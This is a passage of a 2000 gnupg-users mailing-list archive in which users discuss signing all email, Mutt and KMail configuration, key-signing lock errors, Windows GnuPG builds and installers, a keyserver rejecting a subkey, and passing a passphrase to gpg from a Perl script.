seems so unwieldy, so non-standard, and suspicious as we try to avoid attachments.... Its just your point of view.... Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 14 December 2000 19:26:42 -----BEGIN PGP SIGNATURE----- Version: PGPB2 version 0.01.3 iQA/AwUBOjkhNi7i2PqZ2xC9EQKXgACggoDCU0gVnL/Xkurp45GUKPOZwtUAni70 H3K0HRFDDAV7o9btTYwsjnK+ =O+aG -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From davidtg@bigfoot.com Thu Dec 14 20:00:49 2000 From: davidtg@bigfoot.com (David T-G) Date: Thu, 14 Dec 2000 15:00:49 -0500 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001214092506.B7654@berbee.com>; from bryan@bryansweb.com on Thu, Dec 14, 2000 at 09:25:06AM -0600 References: <20001213124142.C31174@berbee.com> <200012131842.eBDIg2Y05044@mail.hsp.de> <20001213124440.D31174@berbee.com> <200012131845.eBDIj0705197@mail.hsp.de> <20001213133740.A31330@berbee.com> <20001214092506.B7654@berbee.com> Message-ID: <20001214150049.D2450@sector13.org> --2Z2K0IlrPCVsbNpk Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Bryan, et al -- =2E..and then Bryan K. Walton said... % Hi, % I would first like to thank Graham, Brian, and Andrew for their response= s to my question regarding clearsigning my emails. As you can see, this me= ssage is clearsigned. You may have intended for it to be clearsigned, but it was in fact simply not signed at all. % Now, I what I would like to do is configure Mut so that it will clearsig= n automatically. I know there is a way to autosign in PGP/MIME format. Bu= t I am having trouble getting it to autosign in clearsign format. I am usi= ng Mutt 1.2.5i. I tried adding "set pgp_create_traditional=3Dyes" to my .m= uttrc but that didn't work. I am also sending this message to the mutt-use= rs list. Do you have any hooks which might reset that to "no"? Have you, in fact, managed to clearsign a message other than this attempt? Just in case you haven't tried it, compose your message and then, from mutt's compose window before you go to send it, enter :set ?pgp_create_traditional and see what it says. If it doesn't set yes, then set it to yes and *then* send it to see what you get. %=20 % Thanks! % Bryan=20 HTH & HAND :-D --=20 David T-G * It's easier to fight for one's principles (play) davidtg@bigfoot.com * than to live up to them. -- fortune cookie (work) davidtgwork@bigfoot.com http://www.bigfoot.com/~davidtg/ Shpx gur Pbzzhavpngvbaf Qrprapl Npg! --2Z2K0IlrPCVsbNpk Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6OSbwUScpmrZtnuoRAo4tAJwKs0wSyUtQSz8mc+llznKBC2TslwCeL/fE WGfyUi6J8R3rOVg90n0Jcxc= =G7f2 -----END PGP SIGNATURE----- --2Z2K0IlrPCVsbNpk-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 14 19:44:56 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 14 Dec 2000 20:44:56 +0100 Subject: majordomo? In-Reply-To: <3A391962208.0E19RICH@mail.dreamscape.com>; from rich@cnylug.org on Thu, Dec 14, 2000 at 02:02:58PM -0500 References: <3A391962208.0E19RICH@mail.dreamscape.com> Message-ID: <20001214204456.R23140@gnupg.de> On Thu, 14 Dec 2000, Rich wrote: > Is majordomo@gnupg.org working? I hope not. There should be no majordomo but a smartlist thing. I thing I removed the autoresponder which told users, that there is no Majordomo. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rodneyp@utanet.at Fri Dec 15 00:36:44 2000 From: rodneyp@utanet.at (Rod Pike) Date: Thu, 14 Dec 2000 22:36:44 -0200 Subject: Error message attempting to sign a key Message-ID: <20001214223642.A965@utanet.at> First let me thank those who responded with how to subscribe. I don't know how I missed the mailing list info under documents on the gnupg home page but I ended up on the gnu.org page and (IMHO) it's doesn't seem to be explained there very clearly. (Again I was probably looking in the wrong place) Anyway here's my question. I'm trying to sign a key using gnupg1.0.4 and I' getting the following message in a loop. gpg: waiting for lock (hold by 821 - probably dead) ... gpg: waiting for lock (hold by 821 - probably dead) ... and it goes on. Any ideas what the problem is? Cheers, Rod -- Rod Pike rodneyp @ utanet.at -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ftobin@uiuc.edu Thu Dec 14 21:38:21 2000 From: ftobin@uiuc.edu (Frank Tobin) Date: Thu, 14 Dec 2000 15:38:21 -0600 (CST) Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214182410.L23140@gnupg.de> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Werner Koch, at 18:24 +0100 on Thu, 14 Dec 2000, wrote: And on a slow box (mine) it even freezes during signature verification. It would be much better if Mutt has an option to check signatures on demand and not every time you open that message. One system that pgpenvelope adopted was the ability to check signatures through procmail; this modifies the body of the message, but one can store the original in a backup folder trivially. - -- Frank Tobin http://www.uiuc.edu/~ftobin/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: pgpenvelope 2.9.0 - http://pgpenvelope.sourceforge.net/ iEYEARECAAYFAjo5PdUACgkQVv/RCiYMT6MJqgCdGa+7jUbCyjpuaxVh6TTJRZqZ bAwAoLDmGLidia1S5IlERTxFNeXfZvWw =pWxo -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Nils@infosun.fmi.uni-passau.de Fri Dec 15 07:19:45 2000 From: Nils@infosun.fmi.uni-passau.de (Nils Ellmenreich) Date: Fri, 15 Dec 2000 08:19:45 +0100 (CET) Subject: Error message attempting to sign a key In-Reply-To: <20001214223642.A965@utanet.at> References: <20001214223642.A965@utanet.at> Message-ID: <14905.50705.757454.743776@barber.fmi.uni-passau.de> >>>"RP" == Rod Pike writes: RP> gpg: waiting for lock (hold by 821 - probably dead) ... RP> gpg: waiting for lock (hold by 821 - probably dead) ... RP> and it goes on. RP> Any ideas what the problem is? Oh yes. Read question 6.11 at http://www.gnupg.org/faq.html Cheers, Nils -- Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Nils@infosun.fmi.uni-passau.de Fri Dec 15 07:40:15 2000 From: Nils@infosun.fmi.uni-passau.de (Nils Ellmenreich) Date: Fri, 15 Dec 2000 08:40:15 +0100 (CET) Subject: Question regarding clearsigning emails automatically Message-ID: <14905.51935.249561.139579@barber.fmi.uni-passau.de> Hi Ralph, >>>"RA" == Ralph Angenendt writes: RA> Nils Ellmenreich wrote: >> act of signing means something like "I have read/written the above. I >> agree with this. To certify this fact, I hereby sign it." That means: RA> OTOH signing all mails means: "If you ever come across a mail which RA> is supposed to be written by me, but is not signed, then please call RA> me to verify that I really sent this mail. It could as well be a RA> fake". I think, the act of signing (whether email or anything else) is roughly what I wrote above. The fact that you'd like people to get in touch with you if they receive some unsigned stuff supposed to come from you - that's just your personal addition (which may be sensible, but is unrelated to the signing itself). RA> IMHO ideally all mails should be signed and all mails should be RA> encrypted. The latter normally fails, as most people are not able to RA> receive encrypted mails. That's for sure. Encrypting only the important stuff is not a good idea. But my point was not to say you shouldn't sign/encrypt all mails. Whether or not doing that is a personal preference. What I am opposing is *automatically* signing (i.e. without entering a passphrase) all mails, as some people seem to do. That is about the same as having a pile of blank stationary paper only with a signature, and using this paper to write each letter. The signature becomes almost meaningless. IIRC, the legal implication of "signing" is that someone had to take his time and, while being fully aware of the consequences, "signed" a document to tell others it's genuine. If this deliberate act is missing (because it's being done automatically) - what does a signed mail tell you? That someone used the account of John Doe's computer to write a mail with his mail client who automatically signs all mails as John Doe. And that almost meaningless ... ;-) Cheers, Nils -- Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From sienix@crosswinds.net Fri Dec 15 12:51:05 2000 From: sienix@crosswinds.net (Guy Van Sanden) Date: Fri, 15 Dec 2000 12:51:05 GMT Subject: Old subject: Kmail and gnupg Message-ID: <20001215.12510563@pcf570.atea.be> Hi I now it's an old subject, but has anyone found anything out about getting gnupg working with kmail? I've been looking around, and things don't look promising... Kind regards Guy -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Fri Dec 15 13:17:53 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Fri, 15 Dec 2000 14:17:53 +0100 Subject: Old subject: Kmail and gnupg In-Reply-To: <20001215.12510563@pcf570.atea.be> References: <20001215.12510563@pcf570.atea.be> Message-ID: <00121514175302.04817@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Friday, 15. December 2000 13:51, Guy Van Sanden wrote: > I now it's an old subject, but has anyone found anything out about > getting gnupg working with kmail? > I've been looking around, and things don't look promising... If you have problems with kmail you'd better send your questions to the KMail-Mailinglist: kmail@kde.org. What exactly is your problem? As you can see I have no problem with KMail 1.2 (KDE 2.0) and GnuPG. They work together absolutely perfect. Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6OhoCqUQWN/hplRsRAgHpAJ41r17y6yqSaUNw9sLQIJk7wsEdsACgnwb4 ZAspcoyKiLtuZ7Ni64j/+CY= =ZMmT -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jam@jamux.com Fri Dec 15 14:56:20 2000 From: jam@jamux.com (John A. Martin) Date: Fri, 15 Dec 2000 09:56:20 -0500 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214182410.L23140@gnupg.de> (Werner Koch; Thu, 14 Dec 2000 18:24:10 +0100) Message-ID: <20001215145620.1DB3F4800C@athene.jamux.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 >>>>> "WK" == Werner Koch >>>>> "Re: Question regarding clearsigning emails automatically" >>>>> Thu, 14 Dec 2000 18:24:10 +0100 WK> On Thu, 14 Dec 2000, David Champion wrote: >> Having the signatures come up, and my mailer and OpenPGP client >> freeze while I wait to download a signature that might and >> might not be on the WK> And on a slow box (mine) it even freezes during signature WK> verification. It would be much better if Mutt has an option to WK> check signatures on demand and not every time you open that WK> message. If you have had the experience of having nasty mail forged with your name and header sender information you will value the option of establishing the practice of _always_ signing your mail so that you can be more credible when you disclaim any unsigned mail attributed to you. I have also come to the opinion that signing all mail and eccrypting all private mail whose recipient will stand for it is not only wise self interest but also a boon to the cause of encouraging widespread acceptance and use of encryption. jam -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: OpenPGP encrypted mail preferred. See iEYEARECAAYFAjo6MPkACgkQUEvv1b/iXy8SdACfSF1LaIq7r7QFFkXf3xNLwjXa KhkAn37CV7j4SxoJz+3QlAKeVWFjyxMy =cgVj -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 15 15:53:50 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 15 Dec 2000 16:53:50 +0100 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001215145620.1DB3F4800C@athene.jamux.com>; from jam@jamux.com on Fri, Dec 15, 2000 at 09:56:20AM -0500 References: <20001214182410.L23140@gnupg.de> <20001215145620.1DB3F4800C@athene.jamux.com> Message-ID: <20001215165350.G26163@gnupg.de> On Fri, 15 Dec 2000, John A. Martin wrote: > If you have had the experience of having nasty mail forged with your > name and header sender information you will value the option of > establishing the practice of _always_ signing your mail so that you That's up to you. It doesn't make sense for me because I know you only from your mails and if a mail is in the same spirit I simply assume that it is you. > I have also come to the opinion that signing all mail and eccrypting > all private mail whose recipient will stand for it is not only wise > self interest but also a boon to the cause of encouraging widespread > acceptance and use of encryption. Agreed. I only wish that my friends would do so and not only the geeks ;-) Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ed@eepatents.com Fri Dec 15 17:04:23 2000 From: ed@eepatents.com (Ed Suominen) Date: Fri, 15 Dec 2000 10:04:23 -0700 Subject: Win32 Installation Package for GPG/WinPT (new) Message-ID: <5.0.2.1.0.20001215091602.028c3260@maia.netsonic.net> After searching in vain for a user-friendly alternative to command-line GPG and the increasingly commercialized PGP, I have finally cobbled together something that I think will work, at least for communications between me and and my clients and colleagues. Without modifying the source of either GPG or WinPT, I've put together an installation package that allows users to install both programs without needing to access the command prompt. (Let's face it, most people don't even know what the command prompt is nowadays.) It also allows users to encrypt and decrypt files with a simple "drag-and-drop" interface and allows generation of a key pair by filling out a text template. There is a documentation folder with the various documentation in PDF and text, including a very basic "how to" overview I've written. A performance benefit is the integration of command-line ZIP compression ("copyleft" licensed) with encryption. Compressing data before encryption makes cryptanalysis of the ciphertext much more difficult, and PGP does this automatically for that reason. The installation executable is at ftp://eepatents.com/clients/gpg32.exe. The ZIP file with the exe's contents is at ftp://eepatents.com/clients/gpg32.zip. It's somewhat thrown together as none of the source code is modified, and it is definitely not a stable release yet, but I think it will achieve the ease-of-use objective I've got in mind. While I will continue to wait for GPA, I think this will do the job for my purposes.I think it ties Timo's work nicely into GPG, with support for "idiot proof" DH/DSS keygen and file encryption/decryption. Suggestions would be most welcome, especially an easy way to allow encryption of files to any recipient. If anyone wants to modify the GPG source code and/or to use the Windows Scripting Host to make this a clear package with less reliance on DOS batch files, that would be great. P.S. - I highly recommend the "Powerarchiver" compression software for Win32. Its freeware license looks a lot like the GPL. See http://www.powerarchiver.com. It works better than any compression utility I've used, and it is compatible with just about every compression format. Ed Suominen Registered Patent Agent Web Site: http://eepatents.com PGP Public Key: http://eepatents.com/key -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From aphex@nullify.org Fri Dec 15 17:11:31 2000 From: aphex@nullify.org (Keith Ray) Date: Fri, 15 Dec 2000 11:11:31 -0600 (CST) Subject: GnuPG 1.0.4-1 + IDEA for Windows Message-ID: <976900291.3a3a50c3ac947@nullify.org> I have been able to successfully cross-compile GnuPG 1.0.4-1 to include the IDEA cipher for Windows. Since this binary now includes both RSA and IDEA, it should be fully backwards compatible with PGP 2.6.x. The following changes were made from a "standard" cross-compile: 1. Statically linked idea.c. Unlike Cygwin, this release requires no DLLs. 2. Removed deprecated warning when using IDEA 3. Removed secure memory warnings (Windows doesn't support secure memory). The patch was fairly trivial and appears to work fine, but I have not done extensive testing so use caution. The binary can be downloaded at www.nullify.org. Please email me if you have any questions or problems. --------------------------------------------------------------------- Keith Ray aphex@nullify.org http://www.nullify.org GPG - 0xAE1B3529 - 8227 60E5 BAA5 9461 CAB3 A6F2 4DFE F573 AE1B 3529 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Fri Dec 15 18:17:57 2000 From: rich@cnylug.org (Rich) Date: Fri, 15 Dec 2000 13:17:57 -0500 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <976900291.3a3a50c3ac947@nullify.org> References: <976900291.3a3a50c3ac947@nullify.org> Message-ID: <3A3A6055A.84B6RICH@mail.dreamscape.com> On Fri, 15 Dec 2000 11:11:31 -0600 (CST) or Thereabouts The voices in my head told me that Keith Ray said: > I have been able to successfully cross-compile GnuPG 1.0.4-1 to include the > IDEA cipher for Windows. Since this binary now includes both RSA and IDEA, it > should be fully backwards compatible with PGP 2.6.x. > ....... Is there any way of writing some code that could actually be permanently added to the GnuPG source tree that would make adding modules to the official GnuPG (Win32) easier? It would seem to make sense to write the code, and keep it in the tree permanently, instead of constantly having to download the latest version, and then hack in the IDEA code, compile, and release a separate version. Plus I think most users would feel more secure and might feel better if it was coming from the "official" GnupG home, instead if grabbing the fragmenting versions of GnuPG (which there now seem to be 2). I was going to post this very message on the usenet to you and the gentleman who did the cygwin version. :-) It is times like this when I wish I was a real programmer. :-) Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rodneyp@utanet.at Fri Dec 15 22:25:51 2000 From: rodneyp@utanet.at (Rod Pike) Date: Fri, 15 Dec 2000 20:25:51 -0200 Subject: Error message attempting to sign a key In-Reply-To: <14905.50705.757454.743776@barber.fmi.uni-passau.de>; from Nils@infosun.fmi.uni-passau.de on Fri, Dec 15, 2000 at 08:19:45AM +0100 References: <20001214223642.A965@utanet.at> <14905.50705.757454.743776@barber.fmi.uni-passau.de> Message-ID: <20001215202550.A883@utanet.at> On Fri, Dec 15, 2000 at 08:19:45AM +0100, Nils Ellmenreich wrote: > > >>>"RP" == Rod Pike writes: > > RP> gpg: waiting for lock (hold by 821 - probably dead) ... > RP> gpg: waiting for lock (hold by 821 - probably dead) ... > RP> and it goes on. > > RP> Any ideas what the problem is? > > Oh yes. Read question 6.11 at http://www.gnupg.org/faq.html > > Cheers, Nils > -- > Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org Dohh, looks like I'm batting a thousand. Thanks for your patience. Cheers, Rod -- Rod Pike rodneyp @ utanet.at -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From kai.raven@gmx.net Fri Dec 15 20:20:46 2000 From: kai.raven@gmx.net (Kai Raven) Date: Fri, 15 Dec 2000 21:20:46 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <976900291.3a3a50c3ac947@nullify.org> References: <976900291.3a3a50c3ac947@nullify.org> Message-ID: <200012152120460057.00AE723D@mail.gmx.net> Hello Keith, On 15.12.2000 [Time:11:11] to subject "GnuPG 1.0.4-1 + IDEA for Windows", you wrote: >I have been able to successfully cross-compile GnuPG 1.0.4-1 to include the >IDEA cipher for Windows. Since this binary now includes both RSA and IDEA, it >should be fully backwards compatible with PGP 2.6.x. Good news. So we have the Disastry GnuPG and yours. It would be good, to have a detailed description of the compilation and the used components for all other Win GPG users. Ciao Kai -- PGP [RSA]: 2048-bit Key-ID: 0x7B251671 3100-bit Key-ID: 0x5526B3B1 Homepage: http://beam.to/raven -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lewis@sistina.com Fri Dec 15 20:32:16 2000 From: lewis@sistina.com (lewis@sistina.com) Date: Fri, 15 Dec 2000 14:32:16 -0600 Subject: GPG key not fully accepted by public key servers Message-ID: <20001215143216.A9955@sistina.com> --RnlQjJ0d97Da+TV1 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable I have a public key that has two subkeys. One is an encryption subkey with expiration date, and the other is a signing subkey with expiration date. = =20 The output of 'gpg --list-keys roadrunner' is: pub 1024D/00292648 2000-11-15 AJ Lewis (Roadrunner) uid AJ Lewis sub 1024g/9809FA0D 2000-11-15 [expires: 2001-05-14] sub 1024D/6B5D8CB1 2000-11-15 [expires: 2001-11-15] When I submit this public key to a keyserver such as http://pgp.ai.mit.edu/= I get this error: Key block in add request contained no new keys, userid's, or signatures. Your key block contained 1 format errors, which were treated as if the erroneous elements hadn't been part of your submission. The last error was on key 0xee72a386: Key block corrupt: more than one signature on subk The interesting thing is that part of the key is accepted so people can sti= ll download it, but I use the second subkey for most of my signing, and that is truncated from the key. Does anyone know why this would be? I can send my ASCII armored public key as well if that would be helpful. Please CC me to any response as I am not on the mailing list. Regards, --=20 AJ Lewis Sistina Software Inc. Voice: 612-379-3951 1313 5th St SE, Suite 111 Fax: 612-379-3952 Minneapolis, MN 55414 E-Mail: lewis@sistina.com http://www.sistina.com Current GPG fingerprint =3D 3B5F 6011 5216 76A5 2F6B 52A0 941E 1261 0029 2= 648 No-one suspects the butterfly! --RnlQjJ0d97Da+TV1 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6On/QpE6/iGtdjLERAhPHAJ9TkIQVuwY4OGt7JjfRwp+M/TaJmACgnM9Z WJDKfVDDeIJNZGDWeHJhfbE= =6jh3 -----END PGP SIGNATURE----- --RnlQjJ0d97Da+TV1-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rmarq@bellatlantic.net Fri Dec 15 14:50:16 2000 From: rmarq@bellatlantic.net (RJ Marquette) Date: Fri, 15 Dec 2000 09:50:16 -0500 (EST) Subject: Question regarding clearsigning emails automatically In-Reply-To: <14905.51935.249561.139579@barber.fmi.uni-passau.de> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, 15 Dec 2000, Nils Ellmenreich wrote: > write a mail with his mail client who automatically signs all mails as > John Doe. And that almost meaningless ... ;-) I'd agree, except for this: What software allows you to sign messages without ever entering the passphrase? With the pine/pgpenvelope/gpg setup I use, I have to enter it each time. I know the Win versions of PGP have a "timeout" where it stores the passphrase for so long (up to 5 minutes IIRC), but you still have to enter it once. That's where your analogy to the "signed but blank stack of documents" breaks down. I disagree that signing every email "cheapens" the process for that reason. I sign most of my list email for several reasons: the more PGP/GPG traffic floating around, the less attention each one receives. Also, don't we look a bit foolish if we claim to be advocates of PGP and GPG, but don't even use it amongst ourselves? ("Practice what you preach.") It doesn't hurt to use the signed messages. Plus, if I didn't I might forget my passphrase. :) RJ :) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- RJ Marquette rmarq(at)bellatlantic.net RSA:448B035F DSS:CB45C555 My PGP and Skating pages: http://rmarq.pair.com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: pgpenvelope - http://www.uiuc.edu/ph/www/ftobin/resources.html iD8DBQE6Oi+s0DB5TMtFxVURArbAAKDLy+weLLjopgKcG+W2fSru/a6GbQCgoHWz YGxSnTJB9t1JCWmvvObLVVM= =hQ6q -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From minton@csc.smsu.edu Fri Dec 15 22:01:39 2000 From: minton@csc.smsu.edu (Brian Minton) Date: Fri, 15 Dec 2000 16:01:39 -0600 Subject: GPG key not fully accepted by public key servers In-Reply-To: <20001215143216.A9955@sistina.com>; from lewis@sistina.com on Fri, Dec 15, 2000 at 02:32:16PM -0600 References: <20001215143216.A9955@sistina.com> Message-ID: <20001215160139.B31820@csc.smsu.edu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, Dec 15, 2000 at 02:32:16PM -0600, lewis@sistina.com wrote: > The output of 'gpg --list-keys roadrunner' is: > pub 1024D/00292648 2000-11-15 AJ Lewis (Roadrunner) > uid AJ Lewis > sub 1024g/9809FA0D 2000-11-15 [expires: 2001-05-14] > sub 1024D/6B5D8CB1 2000-11-15 [expires: 2001-11-15] > Key block corrupt: more than one signature on subk what happens when you do gpg --export 00292648 |gpg --list-packets ? - -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://cs.smsu.edu/~minton /finger minton@csc.smsu.edu _ _ my favorite OS! bjm918s@mail.smsu.edu / for PGP public key. | | <_>._ _ _ _ __ bminton@earthling.net /What are you waiting for, | |_ | || ' || | |\ \/ bminton@efn.org / try Jesus today!!! |___||_||_|_|`___|/\_\ "Many shall run to and fro, and knowledge shall be increased" --Daniel 12:4 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.2 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6OpSrp0PPDCS0QgIRAlzmAJ4mfRtx1lLzsLzIv7dom+3o1X0N2gCgi7Ar SkJkgBxdlwJ0CtH0fxZ4tBY= =eWyO -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lists@wordit.com Fri Dec 15 22:02:04 2000 From: lists@wordit.com (Marcus) Date: Fri, 15 Dec 2000 23:02:04 +0100 Subject: Passphrase in Perl script and Windows Message-ID: <200012152302040984.0017ECFA@smtprelay.t-online.de> Replying to my own question. I was given a simple way to send the passphrase for use in Perl scripts. Here it is for the archives if nobody else needs it at the moment: open(PIPE, "| gpg.exe -o $file.gpg --passphrase-fd 0 -c $file") or die $!; print PIPE $passphrase; Alternatively, Windows will pipe, it just wants an "echo" first. The following is a system command via Perl. echo $passphrase | gpg.exe -o $file.gpg --passphrase-fd 0 -c $file You can adjust the variable syntax for other uses. Btw, how about adding these kinds of examples to a FAQ document? Marcus Friedlaender -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lewis@sistina.com Fri Dec 15 22:08:43 2000 From: lewis@sistina.com (lewis@sistina.com) Date: Fri, 15 Dec 2000 16:08:43 -0600 Subject: GPG key not fully accepted by public key servers In-Reply-To: <20001215160139.B31820@csc.smsu.edu>; from minton@csc.smsu.edu on Fri, Dec 15, 2000 at 04:01:39PM -0600 References: <20001215143216.A9955@sistina.com> <20001215160139.B31820@csc.smsu.edu> Message-ID: <20001215160843.A11168@sistina.com> --nFreZHaLTZJo0R7j Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Dec 15, 2000 at 04:01:39PM -0600, Brian Minton wrote: > On Fri, Dec 15, 2000 at 02:32:16PM -0600, lewis@sistina.com wrote: > > The output of 'gpg --list-keys roadrunner' is: > > pub 1024D/00292648 2000-11-15 AJ Lewis (Roadrunner) > > uid AJ Lewis > > sub 1024g/9809FA0D 2000-11-15 [expires: 2001-05-14] > > sub 1024D/6B5D8CB1 2000-11-15 [expires: 2001-11-15] > > > Key block corrupt: more than one signature on subk >=20 > what happens when you do gpg --export 00292648 |gpg --list-packets ? I get this: :public key packet: version 4, algo 17, created 974309008, expires 0 pkey[0]: [1024 bits] pkey[1]: [160 bits] pkey[2]: [1016 bits] pkey[3]: [1022 bits] :user ID packet: "AJ Lewis (Roadrunner) " :signature packet: algo 17, keyid 941E126100292648 version 4, created 974309008, md5len 0, sigclass 13 digest algo 2, begin of digest f3 29 hashed subpkt 2 len 5 (sig created 2000-11-15) hashed subpkt 11 len 5 (pref-sym-algos: 7 10 3 4) hashed subpkt 21 len 3 (pref-hash-algos: 3 2) hashed subpkt 22 len 3 (pref-zip-algos: 2 1) hashed subpkt 23 len 2 (key server preferences) subpkt 16 len 9 (issuer key ID 941E126100292648) data: [160 bits] data: [156 bits] :user ID packet: "AJ Lewis " :signature packet: algo 17, keyid 941E126100292648 version 4, created 975593280, md5len 0, sigclass 13 digest algo 2, begin of digest d1 be hashed subpkt 2 len 5 (sig created 2000-11-30) hashed subpkt 11 len 5 (pref-sym-algos: 7 10 3 4) hashed subpkt 21 len 3 (pref-hash-algos: 3 2) hashed subpkt 22 len 3 (pref-zip-algos: 2 1) hashed subpkt 23 len 2 (key server preferences) subpkt 16 len 9 (issuer key ID 941E126100292648) data: [158 bits] data: [159 bits] :public sub key packet: version 4, algo 16, created 974309011, expires 0 pkey[0]: [1024 bits] pkey[1]: [3 bits] pkey[2]: [1023 bits] :signature packet: algo 17, keyid 941E126100292648 version 4, created 974310923, md5len 0, sigclass 18 digest algo 2, begin of digest d6 95 hashed subpkt 2 len 5 (sig created 2000-11-15) hashed subpkt 9 len 5 (key expires after 180d0h31m) subpkt 16 len 9 (issuer key ID 941E126100292648) data: [158 bits] data: [160 bits] :public sub key packet: version 4, algo 17, created 974309312, expires 0 pkey[0]: [1024 bits] pkey[1]: [160 bits] pkey[2]: [1023 bits] pkey[3]: [1021 bits] :signature packet: algo 17, keyid 941E126100292648 version 4, created 974309312, md5len 0, sigclass 18 digest algo 2, begin of digest ed 69 hashed subpkt 2 len 5 (sig created 2000-11-15) hashed subpkt 9 len 5 (key expires after 1y0d0h0m) subpkt 16 len 9 (issuer key ID 941E126100292648) data: [158 bits] data: [158 bits] Again, please CC me to any responses. Thanks, --=20 AJ Lewis Sistina Software Inc. Voice: 612-379-3951 1313 5th St SE, Suite 111 Fax: 612-379-3952 Minneapolis, MN 55414 E-Mail: lewis@sistina.com http://www.sistina.com Current GPG fingerprint =3D 3B5F 6011 5216 76A5 2F6B 52A0 941E 1261 0029 2= 648 A computer without a Microsoft operating system is like a dog without bricks tied to its head. --nFreZHaLTZJo0R7j Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6OpZrpE6/iGtdjLERApSLAJ9kvQxwTAvab6DyDhapV+bsrT56VwCfasAd 